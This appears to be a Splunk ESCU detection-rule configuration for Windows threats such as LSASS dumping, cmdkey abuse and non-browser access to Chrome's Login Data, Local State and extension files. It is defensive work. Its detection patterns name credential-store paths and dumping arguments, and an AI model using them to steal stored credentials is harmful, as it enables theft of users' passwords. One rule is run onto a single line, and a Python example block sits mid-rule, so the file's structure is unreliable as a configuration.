action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments"]
action.risk = 1
action.risk.param._risk_message = Windows ConHost with Headless Argument detected on $dest$ by $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 70}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows ConHost with Headless Argument - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 70, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003", "T1564.006"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the unusual use of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter to spawn a new process. This behavior is highly unusual and indicative of suspicious activity, as the --headless parameter is not commonly used in legitimate operations. The analytic identifies this behavior by looking for instances where conhost.exe is invoked with the --headless argument. This behavior is worth identifying for a Security Operations Center (SOC) as it could indicate an attacker's attempt to execute commands or scripts in a stealthy manner, potentially to establish persistence, perform lateral movement, or carry out other malicious activities. If a true positive is identified, it suggests that an attacker has gained a foothold in the environment and is attempting to further their attack, which could lead to serious consequences such as data exfiltration, system compromise, or deployment of ransomware. Potential false positives could arise from legitimate administrative activity, hence it is important to validate the context of the detected behavior during triage.
action.notable.param.rule_title = Windows ConHost with Headless Argument
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=conhost.exe Processes.process="*--headless *" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_conhost_with_headless_argument_filter`

[ESCU - Windows Create Local Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a new local user account added to a computer. Note that this should be restricted to critical assets.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic identifies a new local user account added to a computer. Note that this should be restricted to critical assets.
action.escu.how_to_implement = This search requires you to have enabled your Group Management Audit Logs in your Local Windows Security Policy and be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/
action.escu.known_false_positives = It is possible that an administrator created the account. Verifying activity with an administrator is advised. This analytic is set to anomaly to allow for risk to be added. Filter and tune as needed. Restrict to critical infrastructure to reduce any volume.
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Create Local Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Active Directory Password Spraying"]
action.risk = 1
action.risk.param._risk_message = The following $user$ was added to $dest$ as a local account.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 18}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Create Local Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Password Spraying"], "cis20": ["CIS 10"], "confidence": 90, "impact": 20, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(All_Changes.result_id) as result_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Change where All_Changes.result_id=4720 by All_Changes.user All_Changes.dest All_Changes.result All_Changes.action | `drop_dm_object_name("All_Changes")` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `windows_create_local_account_filter`

[ESCU - Windows Credential Access From Browser Password Store - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a possible non-common browser process accessing its browser user data profile. This tactic/technique has been observed in various Trojan Stealers, such as SnakeKeylogger, which attempt to gather sensitive browser information and credentials as part of their exfiltration strategy. Detecting this anomaly can serve as a valuable pivot for identifying processes that access lists of browser user data profiles unexpectedly. This detection uses a lookup file `browser_app_list` that maintains a list of well known browser applications and the browser paths that are allowed to access the browser user data profiles.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a possible non-common browser process accessing its browser user data profile. This tactic/technique has been observed in various Trojan Stealers, such as SnakeKeylogger, which attempt to gather sensitive browser information and credentials as part of their exfiltration strategy. Detecting this anomaly can serve as a valuable pivot for identifying processes that access lists of browser user data profiles unexpectedly. This detection uses a lookup file `browser_app_list` that maintains a list of well known browser applications and the browser paths that are allowed to access the browser user data profiles.
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." This search may trigger on a browser application that is not included in the browser_app_list lookup file.
action.escu.known_false_positives = The lookup file `browser_app_list` may not contain all the browser applications that are allowed to access the browser user data profiles. Consider updating the lookup files to add allowed object paths for the browser applications that are not included in the lookup file.
action.escu.creation_date = 2024-02-20
action.escu.modification_date = 2024-02-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credential Access From Browser Password Store - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = A non-common browser process $process_name$ accessing browser user data folder on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credential Access From Browser Password Store - Rule
action.correlationsearch.annotations = {"analytic_story": ["Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4663 | lookup browser_app_list browser_object_path as object_file_path OUTPUT browser_process_name isAllowed | stats count min(_time) as firstTime max(_time) as lastTime values(object_file_name) values(object_file_path) values(browser_process_name) as browser_process_name by dest process_name process_path process_id EventCode isAllowed | rex field=process_name "(?<extracted_process_name>[^\\\\]+)$" | eval isMalicious=if(match(browser_process_name, extracted_process_name), "0", "1") | where isMalicious=1 and isAllowed="false" | `windows_credential_access_from_browser_password_store_filter`

[ESCU - Windows Credential Dumping LSASS Memory Createdump - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the use of CreateDump.exe being used to perform a process dump. This particular binary is not native to Windows, but is found to be brought in by many different third-party applications, including PowerShell 7.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies the use of CreateDump.exe being used to perform a process dump. This particular binary is not native to Windows, but is found to be brought in by many different third-party applications, including PowerShell 7.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present if an application is dumping processes; filter as needed. Recommend reviewing createdump.exe usage across the fleet to better understand all usage and by what.
action.escu.creation_date = 2023-01-23
action.escu.modification_date = 2023-01-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credential Dumping LSASS Memory Createdump - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Credential Dumping"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to dump a process.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 70}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 70}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 70}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credential Dumping LSASS Memory Createdump - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 70, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the use of CreateDump.exe being used to perform a process dump. This particular binary is not native to Windows, but is found to be brought in by many different third-party applications, including PowerShell 7.
action.notable.param.rule_title = Windows Credential Dumping LSASS Memory Createdump
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=createdump.exe OR Processes.original_file_name="FX_VER_INTERNALNAME_STR" Processes.process="*-u *" AND Processes.process="*-f *" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credential_dumping_lsass_memory_createdump_filter`

[ESCU - Windows Credentials from Password Stores Chrome Extension Access - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic focuses on identifying non-chrome processes that attempt to access the Chrome extensions file. This file contains crucial settings and information related to the browser's extensions installed on the computer. Adversaries and malware authors have been known to exploit this file to extract sensitive information from the Chrome browser on targeted hosts. Detecting such anomalous behavior provides valuable insights for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for access to the Chrome extensions file by non-chrome processes, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic focuses on identifying non-chrome processes that attempt to access the Chrome extensions file. This file contains crucial settings and information related to the browser's extensions installed on the computer. Adversaries and malware authors have been known to exploit this file to extract sensitive information from the Chrome browser on targeted hosts. Detecting such anomalous behavior provides valuable insights for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for access to the Chrome extensions file by non-chrome processes, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser.
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure."
action.escu.known_false_positives = An application that uninstalls a Chrome browser extension may access this file and folder path to remove the Chrome installation on the target host. Filtering is needed.
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Chrome Extension Access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["DarkGate Malware", "CISA AA23-347A", "Amadey", "RedLine Stealer", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = A non-chrome process $process_name$ accessing chrome browser extension folder files on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Chrome Extension Access - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware", "CISA AA23-347A", "Amadey", "RedLine Stealer", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4663 object_file_path="*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*" AND NOT (process_path IN ("*:\\Windows\\explorer.exe", "*\\chrome.exe")) | stats count min(_time) as firstTime max(_time) as lastTime by object_file_name object_file_path process_name process_path process_id EventCode dest | `security_content_ctime(firstTime)` | 
`security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_chrome_extension_access_filter` [ESCU - Windows Credentials from Password Stores Chrome LocalState Access - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to detect non-chrome processes accessing the Chrome user data file called "local state." This file contains important settings and information related to the browser's operations on the computer. Threat actors, adversaries, and malware authors have been known to exploit this file in attempts to extract the encrypted master key used for decrypting passwords saved in the Chrome browser. Detecting access to the "local state" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can improve our ability to identify potential threats and safeguard sensitive information stored within the browser. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to detect non-chrome processes accessing the Chrome user data file called "local state." This file contains important settings and information related to the browser's operations on the computer. Threat actors, adversaries, and malware authors have been known to exploit this file in attempts to extract the encrypted master key used for decrypting passwords saved in the Chrome browser. Detecting access to the "local state" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can improve our ability to identify potential threats and safeguard sensitive information stored within the browser. 
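The file-access check shared by the three Chrome credential-store rules on this page (Local Extension Settings, Local State and Login Data), as an added example that is not ESCU code: it applies each rule's object_file_path pattern and process allowlist to constructed 4663-style events and groups hits the way the rules' stats clause does. The Event4663 record shape, host names and paths are assumptions; dllhost.exe is excluded only for Login Data, as in the rules.

```python
"""Added example (not part of the ESCU content): the file-access check behind the three
Chrome credential-store rules, run over constructed Windows 4663 events."""
import fnmatch
from dataclasses import dataclass

# One entry per rule: the object_file_path pattern it watches and the process_path
# patterns it allowlists. Patterns are copied from the rules; SPL wildcards map onto fnmatch.
ARTIFACTS = {
    "chrome_extension_access": (
        r"*\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*",
        (r"*:\Windows\explorer.exe", r"*\chrome.exe"),
    ),
    "chrome_localstate_access": (
        r"*\AppData\Local\Google\Chrome\User Data\Local State",
        (r"*:\Windows\explorer.exe", r"*\chrome.exe"),
    ),
    "chrome_login_data_access": (
        r"*\AppData\Local\Google\Chrome\User Data\Default\Login Data",
        (r"*:\Windows\explorer.exe", r"*:\Windows\System32\dllhost.exe", r"*\chrome.exe"),
    ),
}


@dataclass(frozen=True)
class Event4663:
    """Assumed minimal shape of a normalised Security 4663 event."""
    dest: str
    process_path: str
    object_file_path: str


def _match(pattern, value):
    # Windows paths are case-insensitive, so compare lower-cased; fnmatchcase keeps the
    # backslashes literal and lets '*' span directory separators, like an SPL wildcard.
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def classify(event):
    """Return the names of the rules this event would satisfy, or [] if none."""
    hits = []
    for rule, (artifact, allowed) in ARTIFACTS.items():
        if not _match(artifact, event.object_file_path):
            continue
        if any(_match(p, event.process_path) for p in allowed):
            continue  # chrome.exe / explorer.exe (/ dllhost.exe) are expected readers
        hits.append(rule)
    return hits


def run(events):
    """Aggregate like the rules' stats clause: count per (rule, dest, process, object)."""
    summary = {}
    for ev in events:
        for rule in classify(ev):
            key = (rule, ev.dest, ev.process_path, ev.object_file_path)
            summary[key] = summary.get(key, 0) + 1
    return summary


# Constructed sample events (not real telemetry).
SAMPLE = [
    Event4663("ws01", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"),
    Event4663("ws01", r"C:\Users\alice\AppData\Local\Temp\updater.exe",
              r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"),
    Event4663("ws01", r"C:\Users\alice\AppData\Local\Temp\updater.exe",
              r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event4663("ws01", r"C:\Windows\System32\dllhost.exe",
              r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event4663("ws02", r"C:\Windows\explorer.exe",
              r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abcd\000003.log"),
    Event4663("ws02", r"C:\Users\bob\Downloads\invoice.exe",
              r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abcd\000003.log"),
]

if __name__ == "__main__":
    for (rule, dest, proc, obj), n in sorted(run(SAMPLE).items()):
        print(f"{rule}: {proc} -> {obj} on {dest} (count={n})")
```

Only the two unknown executables produce hits; the same updater.exe touching both Local State (the key) and Login Data (the encrypted passwords) is the pairing an analyst should look for when triaging these three rules together.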
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy, then check the two boxes listed for both "Success" and "Failure". Event 4663 is only generated for objects that carry a matching audit entry, so a SACL must also be set on the Chrome "User Data" directory.
action.escu.known_false_positives = Uninstalling the Chrome application may access this file and folder path while removing the Chrome installation from the target host. Filter as needed.
action.escu.creation_date = 2023-04-26
action.escu.modification_date = 2023-04-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Chrome LocalState Access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = A non-chrome process $process_name$ accessing "Chrome\\User Data\\Local State" file on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Chrome LocalState Access - Rule
action.correlationsearch.annotations = {"analytic_story": ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4663 object_file_path="*\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" NOT (process_name IN ("*\\chrome.exe","*:\\Windows\\explorer.exe")) | stats count min(_time) as firstTime max(_time) as lastTime by object_file_name object_file_path process_name process_path process_id EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_chrome_localstate_access_filter`

[ESCU - Windows Credentials from Password Stores Chrome Login Data Access - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies non-chrome processes accessing the Chrome user data file called "Login Data". This SQLite database file holds the credentials the browser has saved for websites: origin URLs, user names and encrypted password values. Threat actors, adversaries and malware authors are known to read this file in attempts to extract and decrypt passwords saved in the Chrome browser. Detecting access to the "Login Data" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies non-chrome processes accessing the Chrome user data file called "Login Data". This SQLite database file holds the credentials the browser has saved for websites: origin URLs, user names and encrypted password values. Threat actors, adversaries and malware authors are known to read this file in attempts to extract and decrypt passwords saved in the Chrome browser. Detecting access to the "Login Data" file by non-chrome processes serves as a valuable pivot for analyzing suspicious processes beyond the commonly observed chrome.exe and explorer.exe executables. By monitoring for this anomaly, we can enhance our ability to detect potential threats and protect sensitive information stored within the browser.
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy, then check the two boxes listed for both "Success" and "Failure". Event 4663 is only generated for objects that carry a matching audit entry, so a SACL must also be set on the Chrome "User Data" directory.
action.escu.known_false_positives = Uninstalling the Chrome application may access this file and folder path while removing the Chrome installation from the target host. Filter as needed.
action.escu.creation_date = 2023-04-27
action.escu.modification_date = 2023-04-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Chrome Login Data Access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = A non-chrome process $process_name$ accessing Chrome "Login Data" file on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Chrome Login Data Access - Rule
action.correlationsearch.annotations = {"analytic_story": ["RedLine Stealer", "Amadey", "Warzone RAT", "NjRAT", "DarkGate Malware", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1012"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4663 object_file_path="*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" AND NOT (process_path IN ("*:\\Windows\\explorer.exe", "*:\\Windows\\System32\\dllhost.exe", "*\\chrome.exe")) | stats count min(_time) as firstTime max(_time) as lastTime by object_file_name object_file_path process_name process_path process_id EventCode dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_chrome_login_data_access_filter`

[ESCU - Windows Credentials from Password Stores Creation - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies execution of the Windows cmdkey.exe tool with arguments that create a stored credential. This tool is abused by several post-exploitation tools and malware families, such as DarkGate, to create stored user names, passwords or credentials on the targeted Windows host. Stored credentials can then be used by the attacker for privilege escalation and persistence on the targeted host in further attacks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies execution of the Windows cmdkey.exe tool with arguments that create a stored credential. This tool is abused by several post-exploitation tools and malware families, such as DarkGate, to create stored user names, passwords or credentials on the targeted Windows host. Stored credentials can then be used by the attacker for privilege escalation and persistence on the targeted host in further attacks.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Network administrators can use this tool for auditing purposes. Filter as needed.
action.escu.creation_date = 2023-11-23
action.escu.modification_date = 2023-11-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows Credentials from Password Stores Creation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["DarkGate Malware"]
action.risk = 1
action.risk.param._risk_message = a process $process_name$ was executed in $dest$ to create stored credentials
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows Credentials from Password Stores Creation - Rule
action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies execution of the Windows cmdkey.exe tool with arguments that create a stored credential. This tool is abused by several post-exploitation tools and malware families, such as DarkGate, to create stored user names, passwords or credentials on the targeted Windows host. Stored credentials can then be used by the attacker for privilege escalation and persistence on the targeted host in further attacks.
action.notable.param.rule_title = Windows Credentials from Password Stores Creation
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="cmdkey.exe" OR Processes.original_file_name="cmdkey.exe") AND Processes.process="*/generic*" AND Processes.process IN ("*/user*", "*/password*") by Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_name Processes.parent_process Processes.parent_process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_credentials_from_password_stores_creation_filter`

[ESCU - Windows Credentials from Password Stores Deletion - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies execution of the Windows cmdkey.exe tool with the /delete argument. This tool is abused by several post-exploitation tools and malware families, such as DarkGate, to delete stored user names, passwords or credentials on the targeted Windows host. Manipulating stored credentials can support an attacker's privilege escalation and persistence on the targeted host in further attacks.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies execution of the Windows cmdkey.exe tool with the /delete argument. This tool is abused by several post-exploitation tools and malware families, such as DarkGate, to delete stored user names, passwords or credentials on the targeted Windows host. Manipulating stored credentials can support an attacker's privilege escalation and persistence on the targeted host in further attacks.
